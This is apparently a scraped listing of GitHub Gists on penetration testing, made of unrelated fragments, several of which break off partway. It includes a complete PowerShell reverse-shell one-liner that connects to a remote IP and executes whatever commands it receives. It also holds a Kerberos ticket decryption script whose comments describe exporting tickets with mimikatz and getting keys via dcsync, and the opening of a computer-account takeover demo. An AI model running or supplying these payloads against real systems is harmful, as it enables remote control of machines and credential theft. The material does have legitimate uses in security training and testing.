- apt-get install postfix
Alternatively, without the bloat of postfix
mmutj
egre55
/ powershell_reverse_shell.ps1
Last active
April 2, 2025 13:44
powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html | |
| $client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() |
jondkelley
/ readme.md
Last active
May 23, 2024 13:28
Linux Awesome Gists 1: Sending a file from command line one-liners
xan7r
/ decryptKerbTicket.py
Last active
March 31, 2025 11:22
Decrypt kerberos tickets and parse out authorization data
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| # NOTE: this script was created for educational purposes to assist learning about kerberos tickets. | |
| # Likely to have a few bugs that cause it to fail to decrypt some TGT or Service tickets. | |
| # | |
| # Recommended Instructions: | |
| # Obtain valid kerberos tickets using Rubeus or mimikatz "sekurlsa::tickets /export" | |
| # Optionally convert tickets to ccache format using kekeo "misc::convert ccache <ticketName.kirbi>" | |
| # Obtain appropriate aes256 key using dcsync (krbtgt for TGT or usually target computer account for Service Ticket) | |
| # Run this script to decrypt: | |
| # ./decryptKerbTicket.py -k 5c7ee0b8f0ffeedbeefdeadbeeff1eefc7d313620feedbeefdeadbeefafd601e -t ./[email protected][email protected] |
HarmJ0y
/ rbcd_demo.ps1
Last active
January 4, 2025 14:26
Resource-based constrained delegation computer DACL takeover demo
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # import the necessary toolsets | |
| Import-Module .\powermad.ps1 | |
| Import-Module .\powerview.ps1 | |
| # we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account | |
| whoami | |
| # the target computer object we're taking over | |
| $TargetComputer = "primary.testlab.local" |
| Filter | Description | Example |
|---|---|---|
| allintext | Searches for occurrences of all the keywords given. | allintext:"keyword" |
| intext | Searches for the occurrences of keywords all at once or one at a time. | intext:"keyword" |
| inurl | Searches for a URL matching one of the keywords. | inurl:"keyword" |
| allinurl | Searches for a URL matching all the keywords in the query. | allinurl:"keyword" |
| intitle | Searches for occurrences of keywords in title all or one. | intitle:"keyword" |
Calculating magic hashes for https://www.whitehatsec.com/blog/magic-hashes/. These strings should probably be put into a blacklist preventing users from using them as passwords to mitigate PHP evaluating hashes starting with "0e" as floats.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-winPEAS | |
| { | |
| [CmdletBinding()] | |
| Param ( | |
| [Parameter(Position = 0, Mandatory = $true)] | |
| [ValidateNotNullorEmpty()] | |
| [String] | |
| $Command | |
| ) |
jonlabelle
/ ldap_search_filter_cheatsheet.md
Last active
April 3, 2025 17:56
LDAP Search Filter Cheatsheet
| title | author | date | source | notoc |
|---|---|---|---|---|
LDAP Search Filter Cheatsheet |
Jon LaBelle |
January 4, 2021 |
true |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ################################################## | |
| # Extra tools | |
| # $ sudo apt install -y bloodhound-ce-python chisel dirsearch enum4linux-ng feroxbuster goshs gobuster grc mssqlpwner nishang peass powercat rlwrap seclists shellter sshpass | |
| # urlencode: | |
| # $ sudo apt install gridsite-clients | |
| # csharp: | |
| # $ sudo apt install mono-csharp-shell | |
| # Install flatpak | |
| # -> https://www.kali.org/docs/tools/flatpak/ | |
| # Python2 pip |
Pentesting-Exploitation Programs and Commands , Protocols Network / Ports